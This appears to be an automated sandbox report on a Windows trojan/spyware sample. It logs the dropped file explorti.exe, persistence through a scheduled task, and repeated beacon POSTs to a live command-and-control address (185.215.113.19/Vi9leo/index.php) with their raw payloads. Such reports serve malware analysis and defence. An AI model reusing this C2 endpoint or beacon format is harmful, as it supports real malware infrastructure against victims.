Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F

Source: Joe Sandbox View

IP Address: 185.215.113.19 185.215.113.19

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 5_2_0069BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,

5_2_0069BD60

Source: unknown

HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: explorti.exe, 00000005.00000002.2903017790.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php
Source: explorti.exe, 00000005.00000002.2903017790.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php4
Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php6
Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php?
Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpC:
Source: explorti.exe, 00000005.00000002.2903017790.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpH
Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpWindows
Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpeb8a7
Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpm32
Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpoft
Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpon
Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phprosoft
Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpsM

System Summary

PE file contains section with special chars

Source: 11NdzR12PS.exe	Static PE information: section name:
Source: 11NdzR12PS.exe	Static PE information: section name: .idata
Source: 11NdzR12PS.exe	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:

Source: C:\Users\user\Desktop\11NdzR12PS.exe

File created: C:\Windows\Tasks\explorti.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_006D3068	5_2_006D3068
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_0069E440	5_2_0069E440
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_00694CF0	5_2_00694CF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_006C7D83	5_2_006C7D83
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_006D765B	5_2_006D765B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_00694AF0	5_2_00694AF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_006D777B	5_2_006D777B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_006D8720	5_2_006D8720
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_006D6F09	5_2_006D6F09
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_006D2BD0	5_2_006D2BD0

Source: 11NdzR12PS.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 11NdzR12PS.exe	Static PE information: Section: ZLIB complexity 0.9997064976092896
Source: 11NdzR12PS.exe	Static PE information: Section: wokugkrf ZLIB complexity 0.9944071718563766
Source: explorti.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9997064976092896
Source: explorti.exe.0.dr	Static PE information: Section: wokugkrf ZLIB complexity 0.9944071718563766

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/3@0/1

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d

Source: C:\Users\user\Desktop\11NdzR12PS.exe

File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7

Jump to behavior

Source: C:\Users\user\Desktop\11NdzR12PS.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\11NdzR12PS.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 11NdzR12PS.exe

Virustotal: Detection: 53%

Source: 11NdzR12PS.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\11NdzR12PS.exe

File read: C:\Users\user\Desktop\11NdzR12PS.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\11NdzR12PS.exe "C:\Users\user\Desktop\11NdzR12PS.exe"
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"	Jump to behavior

Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: urlmon.dll	Jump to behavior
